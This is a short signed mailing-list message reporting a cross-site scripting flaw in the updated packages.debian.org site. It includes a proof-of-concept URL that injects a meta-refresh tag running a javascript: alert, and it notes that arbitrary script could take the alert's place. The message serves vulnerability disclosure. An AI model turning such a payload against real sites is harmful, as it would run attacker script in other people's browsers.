XSS in updated packages.debian.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Hi,
there's an XSS issue in the updated p.d.o:
http://packages.debian.org/content%3D0%3Bjavascript%3Aalert%280%29%3E/http-equiv%3Drefresh/%3Cmeta
The '0' which is output could be replaced by encoded text or arbitrary
javascript instructions.
Moritz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFG8Be0n6GkvSd/BgwRCrjLAJ9VwLWJJWxBKn2XMEcEt0MBU16ObgCggI4l
C0i9uvn/q1uJrUwYkf9oFZo=
=TtSf
-----END PGP SIGNATURE-----
Reply to: